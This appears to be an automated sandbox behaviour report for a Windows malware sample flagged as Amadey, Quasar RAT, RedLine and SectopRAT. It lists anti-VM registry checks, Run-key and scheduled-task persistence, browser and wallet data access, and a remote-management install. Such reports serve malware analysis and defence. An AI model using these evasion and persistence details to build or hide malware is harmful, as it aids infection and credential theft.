memory/3960-466-0x0000000001360000-0x0000000001822000-memory.dmp

memory/2064-467-0x0000000000E90000-0x000000000133A000-memory.dmp

memory/3960-468-0x0000000001360000-0x0000000001822000-memory.dmp

memory/2064-474-0x0000000000E90000-0x000000000133A000-memory.dmp

memory/3960-475-0x0000000001360000-0x0000000001822000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 03ff65d684d0c7a95e846ece8e37fcbf
SHA1 cd669d009471059381f7ed4bba1870a24a861b81
SHA256 7d6d7f3244d8518729df2e95e5cae365eb4aa013bf98827fd596415639248891
SHA512 76a17c9c0eaf6d5885c0486d6dc6374bb306f75800370a6eb2b78fbf26072250592384f2f610577b4a966a7343b7b86efa8957e31f67487ad99c2a718fa950c2

memory/2064-483-0x0000000000E90000-0x000000000133A000-memory.dmp

memory/3960-484-0x0000000001360000-0x0000000001822000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-31 02:02

Reported

2024-07-31 02:04

Platform

win10v2004-20240730-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe"

Signatures

Amadey

trojan amadey

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000020001\d42f45addf.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000057001\jsawdtyjde.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\dropperrr.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d42f45addf.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\d42f45addf.exe" C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e378e7234d.exe = "C:\\Users\\Admin\\1000029002\\e378e7234d.exe" C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\msiexec.exe N/A
N/A N/A C:\Windows\System32\msiexec.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\P: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5Sql.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\python27.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\QtWebEngineProcess.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\curtainmode\CurtainMode64.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5Xml.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\resources\COMODO\oem.rcc C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\RCVirtualPrintDriver-manifest.ini C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\RCVirtualPrintDriverRenderFilter_x86-PipelineConfig.xml C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\RCVirtualPrintDriverRenderFilter_pdf_x64-PipelineConfig.xml C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\log4cplusU.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5PrintSupport.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5Qml.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\qtwebengine_resources.pak C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\RCVirtualPrintDriverRenderFilter_pdf_x86-PipelineConfig.xml C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\enrollment_settings.ini C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\webrtc-plugin.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\edr-plugin.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\RCVirtualPrintDriverRenderFilter_x64-PipelineConfig.xml C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\curtainmode\CurtainMode32.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\offline_mode.ini C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5Core.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\rmmproxy.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\ssh-shellhost.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5QuickWidgets.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\d3dcompiler_47.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5Network.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5Widgets.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\CatUninstaller.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5WebEngine.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\libEGL.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\RHost.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\itsm\__init__.py C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\vcruntime140.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\token.ini C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\RCVirtualPrintDriverRenderFilter_x86.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\proxy_settings.ini C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\sqldrivers\qsqlite.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Gui.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\libGLESV2.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\qtwebengine_resources_200p.pak C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\concrt140.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\plugindlls\MaintenanceWindowPlugin.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5WebEngineCore.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\msvcp140.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\imageformats\qjpeg.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\screenhooks32.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\ItsmRsp.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5Quick.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\qtwebengine_resources_100p.pak C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\imageformats\qgif.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\RCVirtualPrintDriver.inf C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\qdjango-db0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\RmmService.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\imageformats\qico.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\RCVirtualPrintDriverRenderFilter_x64.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\RCVirtualPrintDriver.gpd C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\platforms\qwindows.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\torrent-plugin.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\RDesktop.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\rcvirtualprintdriver.cat C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5WebEngineWidgets.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\SourceHash{373FFE70-5FF7-492D-A2F4-0C6A15D8D503} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC7B.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICDA.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI65D.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI834.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\axplong.job C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI804.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe N/A
File created C:\Windows\Installer\e5d0468.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e5d0468.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI61D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7D5.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID39.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\explorti.job C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\1000029002\e378e7234d.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1000058001\deepweb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\dropperrr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1000020001\d42f45addf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\1000029002\e378e7234d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\kcsnc\glhe.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\dropperrr.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
